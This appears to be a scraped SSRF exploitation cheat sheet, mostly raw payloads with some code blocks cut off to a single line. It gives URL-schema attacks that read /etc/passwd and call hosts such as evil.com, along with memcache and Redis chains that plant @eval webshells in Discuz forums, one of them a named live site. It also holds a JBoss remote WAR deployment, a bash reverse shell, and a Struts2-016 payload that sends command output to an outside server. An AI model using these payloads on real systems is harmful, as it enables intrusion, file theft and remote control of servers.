SSRF PHP function
1 | file_get_contents() |
URL schema support
SFTP
1 | http://safebuff.com/ssrf.php?url=sftp://evil.com:11111/ |
Dict
1 | http://safebuff.com/ssrf.php?dict://attacker:11111/ |
gopher
1 | // http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php |
TFTP
1 | http://safebuff.com/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET |
file
1 | http://safebuff.com/redirect.php?url=file:///etc/passwd |
ldap
1 | http://safebuff.com/redirect.php?url=ldap://localhost:11211/%0astats%0aquit |
PHP-FPM
PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploit
SSRF memcache Getshell
Generate serialize
1 | <?php |
Output
1 | a:1:{s:12:"global_start";s:25:"@eval($_REQUEST['eval']);";} //序列化数据 |
webshell.php
1 | <?php |
back.php
1 | <?php |
example Discuz
open the website
1 | http://bbs.biligame.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myvps/webshell.php?logo.jpg[/img] |
clear data
1 | http://bbs.biligame.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myserver/back.php?logo.jpg[/img] |
backdoor url
1 | http://bbs.biligame.com/data/cache/hello.php |
SSRF Redis Getshell
Generate serialize
1 | <?php |
Output
1 | a:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";a:1:{s:7:"plugins";s:5:"/.*/e";}s:7:"replace";a:1:{s:7:"plugins";s:19:"@eval($_POST["c"]);";}}}s:13:"rewritestatus";i:1;} //序列化数据 |
example Discuz
Open website
1 | http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://you-vps-ip/ssrf.php?.jpg[/img]&formhash=818c8f44 |
Backdoor website
1 | http://192.168.80.116/forum.php?mod=ajax&inajax=yes&action=getthreadtypes |
FFmpeg
cat test.jpg
1 | #EXTM3U |
1 | #EXTM3U |
PostgreSQL
Exploit
1 | > SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\' password=1 port=11211 sslmode=disable','select |
MongoDB
Exploit
1 | > db.copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000') |
CouchDB
exploit
1 | http://localhost:5984/_users/_all_docs |
1 | HTTP/1.1 200 OK |
Attacker could also send requests from CouchDB server to intranet by using replication function
1 | POST http://couchdb:5984/_replicate |
Jboss
Jbosss POC
1 | /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war |
写入shell
1 | http://target.com/ueditor/jsp/getRemoteImage.jsp |
1 | http://target.com/ueditor/jsp/getRemoteImage.jsp |
reverse shell
1 | bash -i >& /dev/tcp/123.45.67.89/9999 0>&1 |
Weblogic
gopher.php
1 | <?php |
vuln website
1 | https://example.com/uddiexplorer/SearchPublicRegistries.jsp |
vps
1 | > nc -lvv 2333 |
Local File Read
1 | http://www.xxx.com/redirect.php?url=file:///etc/passwd |
Bool SSRF
Struts2-016 POC
1 | ?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} |